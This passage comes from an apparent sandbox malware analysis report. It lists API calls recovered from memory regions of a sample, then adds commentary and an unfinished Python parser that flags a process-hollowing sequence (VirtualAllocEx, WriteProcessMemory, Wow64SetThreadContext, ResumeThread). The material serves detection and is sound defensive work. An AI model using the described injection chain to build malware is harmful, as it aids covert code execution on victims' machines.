                                            • Instruction Fuzzy Hash: 585165B0A043099FDB54CFA9DA48BEEFBF1EF88314F24845AE409A7261DB345944CB65

                                            Control-flow Graph (legend: Executed / Not Executed)
                                            control_flow_graph 1873 29a79d8-29a7a67 GetCurrentProcess 1877 29a7a69-29a7a6f 1873->1877 1878 29a7a70-29a7aa4 GetCurrentThread 1873->1878 1877->1878 1879 29a7aad-29a7ae1 GetCurrentProcess 1878->1879 1880 29a7aa6-29a7aac 1878->1880 1882 29a7aea-29a7b05 call 29a7ba7 1879->1882 1883 29a7ae3-29a7ae9 1879->1883 1880->1879 1886 29a7b0b-29a7b3a GetCurrentThreadId 1882->1886 1883->1882 1887 29a7b3c-29a7b42 1886->1887 1888 29a7b43-29a7ba5 1886->1888 1887->1888
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 029A7A56
                                            • GetCurrentThread.KERNEL32 ref: 029A7A93
                                            • GetCurrentProcess.KERNEL32 ref: 029A7AD0
                                            • GetCurrentThreadId.KERNEL32 ref: 029A7B29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 97f3fa98a649291d9dc456e5ff84a3ef927ede9beeb42abd731aa235b79361d9
                                            • Instruction ID: 6623296c9baeb83fbe97c48de435d31db3cfbc587175b41fbc15aa40cae8000a
                                            • Opcode Fuzzy Hash: 97f3fa98a649291d9dc456e5ff84a3ef927ede9beeb42abd731aa235b79361d9
                                            • Instruction Fuzzy Hash: 335135B09003099FDB54CFAADA48BEEFBF5EF88314F248459E419A7350DB345944CB65
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 08237c859f14963a72eea655718200674398e83cefbe15903e4dcc5bfb7ecde2
                                            • Instruction ID: d971dad47b632199c8682f394b86cea5ee77ea95e6164fffd462b27f8be434da
                                            • Opcode Fuzzy Hash: 08237c859f14963a72eea655718200674398e83cefbe15903e4dcc5bfb7ecde2
                                            • Instruction Fuzzy Hash: EEE1BE6D944985DBCF128FA4C4A15D9FFB0FF1B715B1809DDC4D19B222EB325886CB90
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09987A9F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 009a6935281f1b84b793cfe6a51503ff819cc0a0a0ff3629a066f351bf12bcf4
                                            • Instruction ID: 3476f67691f06d411e5592aea3108d7c3e5dd75b48288d264e0dd002c055d85d
                                            • Opcode Fuzzy Hash: 009a6935281f1b84b793cfe6a51503ff819cc0a0a0ff3629a066f351bf12bcf4
                                            • Instruction Fuzzy Hash: 01C12871D002198FDF24DFA8C881BEEBBB5BF49300F1495A9E859B7250DB749A85CF90
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09987A9F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: c99575ce52dcad3996f9c26206a79f5e9efc1c9ce44b920d4042711a12383813
                                            • Instruction ID: 11d8660fd4e172c4938f1f24a352ddf42a894773543dc6169fd420b04c764b4a
                                            • Opcode Fuzzy Hash: c99575ce52dcad3996f9c26206a79f5e9efc1c9ce44b920d4042711a12383813
                                            • Instruction Fuzzy Hash: 9EC12771D002198FDF20DFA8C841BEEBBB5BF49300F1495A9E859B7250DB749A85CF91
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(?), ref: 029A5872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 338b76d1b450603065d30544a087688f00d64bfef766d26a643661b603468e59
                                            • Instruction ID: ed1674f618693551d6d905b2f10b01e87c3f3c2f3ed081651baa7a413f53922f
                                            • Opcode Fuzzy Hash: 338b76d1b450603065d30544a087688f00d64bfef766d26a643661b603468e59
                                            • Instruction Fuzzy Hash: 909111B0E00B098FDB64DF69D454BAABBF5FF88304F14892AE44AE7650D770E945CB90
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029AC491
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: c905b501fa2dbce3c823112b01552b6357a05c0126efef4809b77904256cc8d2
                                            • Instruction ID: b578a8f6c5f525bc78c5bf48e8d952fbe2968afa47c64708cd9abbd0cb6ef58d
                                            • Opcode Fuzzy Hash: c905b501fa2dbce3c823112b01552b6357a05c0126efef4809b77904256cc8d2
                                            • Instruction Fuzzy Hash: D1718BB4D04218DFDF21CFA9D984ADDBBF1BB0A310F1491AAE808AB211D730A985CF55
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 029AC491
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 46b7ab9025bdc80cc95b782e25cc00f9a76a494509bde2d6345998265b7a37fb
                                            • Instruction ID: 28f5a33ec65563e29d4519e9c392edfd9e2833a534d53e0078497654b0cdf7dc
                                            • Opcode Fuzzy Hash: 46b7ab9025bdc80cc95b782e25cc00f9a76a494509bde2d6345998265b7a37fb
                                            • Instruction Fuzzy Hash: A7717BB4D04318DFDF20CFA9D984ADDBBF1BB09314F1491AAE818AB211D770AA85CF54
                                            APIs
                                            • CreateIconFromResourceEx.USER32 ref: 099427F3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191264997.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9940000_file.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: da5f6d50d1fcd62cf7f1fddf1b91aa891a6824fd6d05ef41e8777e2ea5932b93
                                            • Instruction ID: f62d739fd85ad83c3d1171c6a699b45acc9741207a6f3d78f2834da9ee13ba38
                                            • Opcode Fuzzy Hash: da5f6d50d1fcd62cf7f1fddf1b91aa891a6824fd6d05ef41e8777e2ea5932b93
                                            • Instruction Fuzzy Hash: E651DBB5D042589FCF01CFA9D880AAEBFF5FF1A310F14906AE914AB221C335A951DF64
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 028EF9E1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 2a54748163c6f383e612417bbe944dab637bc335e062f8ca0e8587fffc0dca1a
                                            • Instruction ID: 92908184869c0436733c5cc0122fe3fb0cbfaa898d49a534026d2223a8fb3db5
                                            • Opcode Fuzzy Hash: 2a54748163c6f383e612417bbe944dab637bc335e062f8ca0e8587fffc0dca1a
                                            • Instruction Fuzzy Hash: 8251C3B5D0021D8FDB21DFA8C840B9EBBF5EF59304F1084AAD509AB251DA716A89CF91
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09987523
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 74f8a9299f5b52fe4b6b65075001d7784769a854bb5baf88eccb605fd9463be2
                                            • Instruction ID: a283e5ec0dd18339eec21f385ca0424139195a45d68618bc84f0cad669c6b15a
                                            • Opcode Fuzzy Hash: 74f8a9299f5b52fe4b6b65075001d7784769a854bb5baf88eccb605fd9463be2
                                            • Instruction Fuzzy Hash: 8F41AAB5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE819B7210C735AA45CF64
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09987523
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 57966e4b549603ca9071629ddd30973a77eb67e3544e5476c3f7ac2138428ce5
                                            • Instruction ID: 4ba904792910a51356c8a427f8734ee26edfd01d45f4a53297b4f9529632494f
                                            • Opcode Fuzzy Hash: 57966e4b549603ca9071629ddd30973a77eb67e3544e5476c3f7ac2138428ce5
                                            • Instruction Fuzzy Hash: E84199B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE818B7250D735AA45CF64
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029A7CEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 982caca295843eccce4d4089d3eacb6b0e89640b55728f7226cb066fd7afbf83
                                            • Instruction ID: 30cf6aa74c787b1cbd1110055de15caca40621973e710819538b1cfaf22dbe5b
                                            • Opcode Fuzzy Hash: 982caca295843eccce4d4089d3eacb6b0e89640b55728f7226cb066fd7afbf83
                                            • Instruction Fuzzy Hash: C74179B9D002589FCB01CFA9D985AEEFBF5FB09310F14946AE918AB310D335A945CF94
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0998765A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: db8ce796e89256c9bc692b0384152cbf88b2d00d14494de8f89323751ad23f87
                                            • Instruction ID: fb8bdd5b4059c11e561d6f39dda3c3043927304b67e69d8e42c1946de02847f7
                                            • Opcode Fuzzy Hash: db8ce796e89256c9bc692b0384152cbf88b2d00d14494de8f89323751ad23f87
                                            • Instruction Fuzzy Hash: 7D41A7B5D002599FCF10CFA9D884AEEFBB1BB59310F14942AE819B7250C735A946CF64
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029A7CEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: cf278016359da79054d80f36f6ea8facef5451cf5c69ea29de94f07d7180d8a8
                                            • Instruction ID: 37be11ed54b44fc3157e4ef7f35e1f3dbeb55a7815f59d39d1e9f335261db1be
                                            • Opcode Fuzzy Hash: cf278016359da79054d80f36f6ea8facef5451cf5c69ea29de94f07d7180d8a8
                                            • Instruction Fuzzy Hash: 594165B9D002589FCF00CFA9D984ADEFBF5BB09310F14906AE918AB310D335A945CFA4
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0998765A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 01ec3581421ec398240387ec6aa4baaaa8c559f17574f1553f64bc831b7968af
                                            • Instruction ID: 6b73de9c162cd23bb986e3a75a74407c537d2cdabea4b021db0aa2477e1e9e46
                                            • Opcode Fuzzy Hash: 01ec3581421ec398240387ec6aa4baaaa8c559f17574f1553f64bc831b7968af
                                            • Instruction Fuzzy Hash: A541A9B5D042589FCF10CFAAD884AEEFBB5BB59310F14942AE819B7200C735A945CF68
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099873DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 352d5a0c2c33af046c7580ef9db2da3dd7fae491547aa5edb87fe908278c36b2
                                            • Instruction ID: f4aeabc805bab5463841a608579a542e00161041d7bc465dc0bc24430ef3b8a0
                                            • Opcode Fuzzy Hash: 352d5a0c2c33af046c7580ef9db2da3dd7fae491547aa5edb87fe908278c36b2
                                            • Instruction Fuzzy Hash: 0231BAB5D042589FCF10CFA9E884AEEFBB1FB59310F20942AE815B7250D735A946CF64
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099873DA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 54b22519dc81fb266284d06a48a535eb5e34df8810b42f5948d31efc6e9c65e8
                                            • Instruction ID: 69b83ed6881379321b4ac258b3a425164c1a1488a89851112499ec15b30489fe
                                            • Opcode Fuzzy Hash: 54b22519dc81fb266284d06a48a535eb5e34df8810b42f5948d31efc6e9c65e8
                                            • Instruction Fuzzy Hash: DD31AAB9D002589FCF10CFA9D980ADEFBB5FB59310F10942AE814B7200D735A946CF64
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: fa823dd72183c2b13defdb6dc43dd34dc9d6c66385f627693dd33e5a0caeea73
                                            • Instruction ID: 0927ca53384246f48f05d8867a52217616c86d44ca1694dd28be8f72a3cc414a
                                            • Opcode Fuzzy Hash: fa823dd72183c2b13defdb6dc43dd34dc9d6c66385f627693dd33e5a0caeea73
                                            • Instruction Fuzzy Hash: B741A9B9D042589FCF10CFA9D984AEEFBB1BB1A310F14905AE815B7220D375A945CF64
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 029AEB01
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 4843d777f4f382409058b552d076aaf4fabd119b525a363448f2791d0cb2241c
                                            • Instruction ID: 0c6ee19a865211a9c057d8034323b0631e1f4882866e913140847ac999904fa7
                                            • Opcode Fuzzy Hash: 4843d777f4f382409058b552d076aaf4fabd119b525a363448f2791d0cb2241c
                                            • Instruction Fuzzy Hash: 944119B5A00305CFCB14CF99C898AAABBF5FF88314F25C859D559A7321D735A841CFA0
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 099872B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 5ecd7b23779b6904ce2f790715283d4fd2fedfb919a494b6804c784f50480a38
                                            • Instruction ID: 129e0865a6b6e1cbf8a8058f0ddfc29c553eb5109b3ea854dd139be83834f0d7
                                            • Opcode Fuzzy Hash: 5ecd7b23779b6904ce2f790715283d4fd2fedfb919a494b6804c784f50480a38
                                            • Instruction Fuzzy Hash: 2C41BCB5D012589FCB10DFA9D884AEEBFF1BF59310F24842AE414B7250C7385945CF64
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 801b9f6ac65b810c5ae3d5e529181634e6dcb3bb6c5b448778802922bd1995e4
                                            • Instruction ID: 92e88d7ede0d620838193ec2877268ffa4e8e3cae739a07d4a05da572cb8a18d
                                            • Opcode Fuzzy Hash: 801b9f6ac65b810c5ae3d5e529181634e6dcb3bb6c5b448778802922bd1995e4
                                            • Instruction Fuzzy Hash: 4331A7B9D042589FCF10CFA9E980AEEFBF0BB19310F24902AE814B7210C335A944CF64
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 099872B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 0e3856c738e90e03bfbca38b311e36586e8beaf846d542b53894b6292d87e94d
                                            • Instruction ID: 4a87cd5a5951ba7f2db1cf7388035e179e9bdb1bf3e8e7907b7d4c918910a308
                                            • Opcode Fuzzy Hash: 0e3856c738e90e03bfbca38b311e36586e8beaf846d542b53894b6292d87e94d
                                            • Instruction Fuzzy Hash: 3A31A9B5D012589FCB10DFAAD984AEEBBF5BB59310F24802AE418B7240C738A945CF64
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 0998B87B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: f06ffd5c3a898f520f76daae6f0b2adab427b269404e2c6e8d9f9478fa7e8823
                                            • Instruction ID: bf3a75706809d779edf298f23828c12c2908783e2f1e9e1594dc5eeac0f3c91e
                                            • Opcode Fuzzy Hash: f06ffd5c3a898f520f76daae6f0b2adab427b269404e2c6e8d9f9478fa7e8823
                                            • Instruction Fuzzy Hash: 763177B9D042589FCF10CFA9D984A9EFBF4EB19310F14902AE818BB310D375A945CFA4
                                            APIs
                                            • PostMessageW.USER32(?,?,?,00000000), ref: 0998B87B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: bcfafc538888c3a04b708d1977db777a9c3b8104a36c7254321bf7d4445c7167
                                            • Instruction ID: 509bc778867c0aca7b3c6f85ab81c19e40d7f1e004c8872a49060fce3b7210b0
                                            • Opcode Fuzzy Hash: bcfafc538888c3a04b708d1977db777a9c3b8104a36c7254321bf7d4445c7167
                                            • Instruction Fuzzy Hash: 983177B9D052589FCB14CFA9D984A9EFBF4AB59310F14902AE818BB310D335A9458F64
                                            APIs
                                            • OutputDebugStringW.KERNELBASE(?), ref: 028EA62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: DebugOutputString
                                            • String ID:
                                            • API String ID: 1166629820-0
                                            • Opcode ID: f1d432386bfb3f999fa443e89a731d5e6006ef005b8cd50a2520a99a7f678d48
                                            • Instruction ID: 295d78850a234fa3540bbacb1bf92b3bc72a66cdb3ad64411a35c38e78be3867
                                            • Opcode Fuzzy Hash: f1d432386bfb3f999fa443e89a731d5e6006ef005b8cd50a2520a99a7f678d48
                                            • Instruction Fuzzy Hash: A531A9B8D002599FCB14CFA9E984ADEFBF1AB49314F14806AE818B7221D735A945CF64
                                            APIs
                                            • OutputDebugStringW.KERNELBASE(?), ref: 028EA62A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID: DebugOutputString
                                            • String ID:
                                            • API String ID: 1166629820-0
                                            • Opcode ID: f25271e72466302fdd3837b5d0f9d1de1ad50d4f8b633d745b41b2fc4e676880
                                            • Instruction ID: 49540f2606fb48e11d80cb580fb7da47e9890f77829462cba6a533b288eeee30
                                            • Opcode Fuzzy Hash: f25271e72466302fdd3837b5d0f9d1de1ad50d4f8b633d745b41b2fc4e676880
                                            • Instruction Fuzzy Hash: 2431A9B8D002189FCF14CFA9D984A9EFBF5AB49314F14906AE818B7321D735A945CF64
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(?), ref: 029A5872
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6e1b3261a9d2b15bfa0831649092a43490647934e5d1afe6a139ae81b8b56c2f
                                            • Instruction ID: ee6b899f3238055c4c0c227f691f1165c10cef70cd1816743fcb7ca49066bdb8
                                            • Opcode Fuzzy Hash: 6e1b3261a9d2b15bfa0831649092a43490647934e5d1afe6a139ae81b8b56c2f
                                            • Instruction Fuzzy Hash: 463188B5D002599FCB14CFAAD984ADEFBF5AB49314F14906AE818B7320D334A945CFA4
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09986D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d9964586a78b34f42f98f21a1fef59076a5ba78f8553b23c47df682750e31c37
                                            • Instruction ID: ba5b4e9e08f86de6e6a226034d20f876dee2584d6e0722eee875dcac0ea6a5dd
                                            • Opcode Fuzzy Hash: d9964586a78b34f42f98f21a1fef59076a5ba78f8553b23c47df682750e31c37
                                            • Instruction Fuzzy Hash: 9331B8B4D112589FCF14CFA9E985AAEFBB5FB59310F14942AE819B7200C735A901CF64
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09986D5E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 4f05189020e873b38315056b1056b80972731b75a97a626c508798a9cc7a9331
                                            • Instruction ID: 56cf38aeaae34f76676d0f27d518f3b6531b948f3da03a3687c0521a9dc7d971
                                            • Opcode Fuzzy Hash: 4f05189020e873b38315056b1056b80972731b75a97a626c508798a9cc7a9331
                                            • Instruction Fuzzy Hash: 8131C9B4D012189FCF10CFA9D984AAEFBB4FB49310F14942AE819B7200CB35A901CFA4
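Read together rather than one record at a time, the entries above carry the point a responder wants: the functions carved from the 09980000 region call VirtualAllocEx, Wow64SetThreadContext and ResumeThread, which is the allocate-in-target / rewrite-entry-context / resume sequence behind the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures in the summary, while the 028E0000 and 029A0000 regions only carry VirtualProtect, OutputDebugStringW, CloseHandle, CallWindowProcW and GetModuleHandleW. The following parser is an added example and not Joe Sandbox code or report output: it pairs each "• Api.MODULE(...), ref: ADDR" line with the "Memory Dump Source" Offset that follows it, groups calls per region, checks that each call site lies at or above the region base (a sanity check that the pairing is right; the report itself gives no region size, so no upper bound is assumed), and flags a region containing the hollowing sequence. The embedded excerpt is copied from the entries above with the repeated entries and the hash lines dropped; accepting plain SetThreadContext as well as the Wow64 variant is a generalisation not shown on this page.

```python
import re
from collections import defaultdict

# Constructed excerpt: the API-bearing records from the listing above, each
# once, with leading whitespace and the Opcode/Instruction hash lines removed.
SAMPLE = """\
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 099873DA
Memory Dump Source
• Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E831F
Memory Dump Source
• Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 029AEB01
Memory Dump Source
• Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 099872B7
Memory Dump Source
• Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
APIs
• PostMessageW.USER32(?,?,?,00000000), ref: 0998B87B
Memory Dump Source
• Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
APIs
• OutputDebugStringW.KERNELBASE(?), ref: 028EA62A
Memory Dump Source
• Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
APIs
• GetModuleHandleW.KERNELBASE(?), ref: 029A5872
Memory Dump Source
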